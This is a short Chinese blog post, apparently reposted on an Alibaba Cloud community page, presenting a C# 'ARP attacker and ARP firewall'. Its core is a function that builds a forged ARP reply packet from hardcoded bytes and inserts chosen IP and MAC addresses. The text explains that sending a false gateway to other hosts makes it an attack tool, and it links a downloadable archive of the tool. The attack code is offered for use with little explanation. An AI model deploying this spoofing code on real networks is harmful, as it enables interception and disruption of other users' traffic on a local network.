c# 寫的ARP攻擊器和ARP防火牆

來源:互聯網
上載者:User

     首先你要先看看ARP是什麼東西,我就不給你講了。知道原理就行。

我這個代碼是調用開源項目SharpPcap開源的網路捕獲項目http://sourceforge.net/projects/sharppcap/。

  這個項目和所有sniffer軟體一樣,是用wincap庫的。需要安裝wincap。http://www.winpcap.org/

 

核心代碼貼出了,就是這麼簡單,手動構造ARP資料包,然後通過sharppcap裡的庫發送出去。。。

不停的發給自己正確的網關,那就是ARP防火牆。

不停的發給別人錯誤的網關,那就是ARP攻擊器。

        /// <summary>
/// 擷取資料包
/// </summary>
/// <returns></returns>
public byte[] getPacket(byte[] yIP,byte[] mIP,byte[] yMAC,byte[] mMAC)
{
//ARP資料包
byte[] packet = new byte[] { 0xe0, 0xcb, 0x4e, 0x2f, 0x8a, 0xc7, 0x00, 0x23, 0xcd, 0x34, 0x20, 0x0e, 0x08, 0x06, 0x00, 0x01, 0x08, 0x00, 0x06, 0x04, 0x00, 0x02, 0x00, 0x23, 0xcd, 0x34, 0x20, 0x0e, 0xc0, 0xa8, 0x01, 0x01, 0xe0, 0xcb, 0x4e, 0x2f, 0x8a, 0xc7, 0xc0, 0xa8, 0x01, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5d, 0x27, 0xa1, 0xb5};

//迴圈替換IP
for (int i = 0; i < 4; i++)
{
packet[i + 28] = yIP[i];


packet[i + 38] = mIP[i];
}

//迴圈替換MAC
for (int i = 0; i < 6; i++)
{
packet[i+ 22] = yMAC[i];
packet[i] = mMAC[i];
packet[i+6] = yMAC[i];
packet[i + 32] = mMAC[i];
}

return packet;
}

看看這個連結能下不  http://files.cnblogs.com/zifeiniu/ARP%E6%94%BB%E5%87%BB%E5%92%8C%E9%98%B2%E7%81%AB%E5%A2%99.rar

                             子非牛  QQ 378716196

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.